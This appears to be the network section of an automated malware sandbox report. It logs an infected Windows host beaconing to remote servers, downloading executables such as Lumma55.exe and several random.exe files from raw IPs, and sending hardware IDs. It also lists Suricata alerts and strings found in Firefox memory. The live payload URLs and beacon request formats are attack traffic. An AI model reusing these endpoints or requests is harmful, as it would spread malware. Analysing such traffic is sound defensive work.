Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/Lumma55.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 32 37 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008276001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 32 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008281001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 32 38 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008282001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIDAFHCBAKFCAAKFCFCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 44 41 46 48 43 42 41 4b 46 43 41 41 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 38 39 32 44 45 35 35 32 38 36 33 35 37 36 38 35 30 37 39 38 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 41 46 48 43 42 41 4b 46 43 41 41 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 41 46 48 43 42 41 4b 46 43 41 41 4b 46 43 46 43 2d 2d 0d 0a Data Ascii: ------FHIDAFHCBAKFCAAKFCFCContent-Disposition: form-data; name="hwid"48892DE552863576850798------FHIDAFHCBAKFCAAKFCFCContent-Disposition: form-data; name="build"mars------FHIDAFHCBAKFCAAKFCFC--
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 32 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008283001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBGHCGCAEBFIJKFIDBGHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 38 39 32 44 45 35 35 32 38 36 33 35 37 36 38 35 30 37 39 38 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 2d 2d 0d 0a Data Ascii: ------FBGHCGCAEBFIJKFIDBGHContent-Disposition: form-data; name="hwid"48892DE552863576850798------FBGHCGCAEBFIJKFIDBGHContent-Disposition: form-data; name="build"mars------FBGHCGCAEBFIJKFIDBGH--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 32 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008284001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49784 -> 104.21.93.105:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49788 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49790 -> 104.21.93.105:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49796 -> 104.21.93.105:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49803 -> 104.21.93.105:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49813 -> 104.21.93.105:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49808 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49815 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49816 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49822 -> 104.21.93.105:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49823 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49831 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49839 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49844 -> 104.21.93.105:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49843 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49830 -> 104.21.93.105:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49853 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49859 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49865 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49868 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49880 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49887 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49850 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49892 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49858 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49894 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49906 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49911 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49920 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49930 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49933 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49938 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49952 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49969 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49986 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49994 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50000 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50006 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50012 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50021 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50030 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50039 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/Lumma55.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:url[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "requestHeaders"]]https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService:_selectAndInstallUpdate - update not supported for this system. Notifying observers. topic: update-available, status: unsupportedhttps://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:url[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "requestHeaders"]]https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService:_selectAndInstallUpdate - update not supported for this system. Notifying observers. topic: update-available, status: unsupportedhttps://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ?disabled=UpdateService:_postUpdateProcessing - status is pending-elevate, but this is a silent startup, so the elevation window has been suppressed.https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: Boolean used to determine if the results defined in `exposureResults` should be shown in search results. Should be false for Control branch of an experiment.You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: Boolean used to determine if the results defined in `exposureResults` should be shown in search results. Should be false for Control branch of an experiment.You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
